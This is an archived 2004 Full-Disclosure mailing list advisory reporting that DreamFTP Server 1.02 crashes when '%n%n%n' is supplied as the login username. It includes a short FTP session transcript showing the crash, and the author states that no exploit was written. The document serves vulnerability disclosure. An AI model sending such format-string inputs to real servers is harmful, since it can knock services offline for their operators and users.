lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <2828.63.203.159.145.1076131794.squirrel@web.axisamerica.com>
From: badpack3t at security-protocols.com (badpack3t)
Subject: DreamFTP Server 1.02 Buffer Overflow

SP Research Labs Advisory x09
--------------------------------------------

DreamFTP 1.02 Buffer Overflow
--------------------------------------------

Vendor Home Page:
http://www.bolintech.com/

Date Released - 2.6.2004

---------------------------------------------------
Product Description from the vendor:

Dream FTP Server provides powerful, multithreaded and robust FTP server
performance with a user-friendly and easy-of-use interfaces.

--------------------
Buffer Overflow

When connecting to the ftp server and supplying %n%n%n for the username,
the ftp server crashes.

Example:
---------

C:\>ftp 192.168.1.101
Connected to 192.168.1.101.
220- ****************************************
220-
220- Welcome to Dream FTP Server
220- Copyright 2002 - 2004
220- BolinTech Inc.
220-
220- ****************************************
220-
220
User (192.168.1.101:(none)): %n%n%n
Connection closed by remote host.

**Application Crashes**

----------
Exploit:

Not worth the time to debug and code an exploit.

--------------------------------------
Tested on WindowsXP SP1

Original Advisory:

http://www.security-protocols.com/modules.php?name=News&file=article&sid=1722

peace out,

------------------------------
badpack3t
www.security-protocols.com
------------------------------




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ